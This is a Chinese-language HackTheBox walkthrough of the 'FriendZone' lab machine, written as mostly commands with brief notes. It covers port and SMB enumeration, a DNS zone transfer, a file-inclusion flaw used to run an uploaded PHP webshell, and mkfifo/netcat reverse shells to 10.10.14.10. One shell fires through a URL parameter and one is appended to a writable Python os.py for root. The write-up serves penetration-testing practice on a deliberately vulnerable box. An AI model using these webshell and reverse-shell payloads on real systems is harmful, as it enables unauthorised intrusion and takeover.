端口扫描
nmap -sS -Pn -n --open -T4 -p 1-65535 10.10.10.123
目录扫描
不清楚是什么,密码?cms?
smb漏洞扫描
enum4linux 10.10.10.123
more creds.txt
发现了登陆密码
admin:WORKWORKHhallelujah@#
回头看,443端口是404,但是开了53端口,查看证书发现了一个域名
子域名目录扫描
dirsearch https://friendzone.red/
base64解密也灭发现什么
又把目标转到dns上了
dig axfr friendzone.red @10.10.10.123
这些域名写入hosts
文件包含
然后挨个尝试
密码就是smb里查到的admin
让访问dash文件
有点像文件包含漏洞,读passwd 没显示
当我读取login页面,发现成功了
说明存在文件包含,这时登陆smb,写一个webshell,然后监听
smb写文件
但是路径不清楚,不过在前面smb漏洞扫描中发现其中有一个路径是/etc/file
这里可使用nmap脚本进行探测
nmap --script smb-enum-shares.nse -p445 10.10.10.123
cat cmd.php <?php systems($_REQUEST['cmd']);?> smbclient //10.10.10.123/Development -c 'put cmd.php 1.php'
文件包含,还是相对路径使用?传参数就不成功换成&就OK了
https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/1&cmd=id
反弹shell
https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/1&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.14.10 7777 >/tmp/f
root提权
信息收集,使用pspy64 在opt下发现脚本文件
查询可写文件
cd /usr/lib/python2.7 find -type f -writable -ls
发现os.py可写入,于是写入反弹shell命令,运行脚本,就会引用os库,就能产生反弹shell
echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 9999 >/tmp/f')" >> /usr/lib/python2.7/os.py
总结:像HTB这种,每一个端口细节都不能放过,能渗透就都渗透一遍,常规端口不行,就全端口,一般也都是端口扫描,目录扫描,漏洞扫描,至于啥地步就看信息收集的能力了。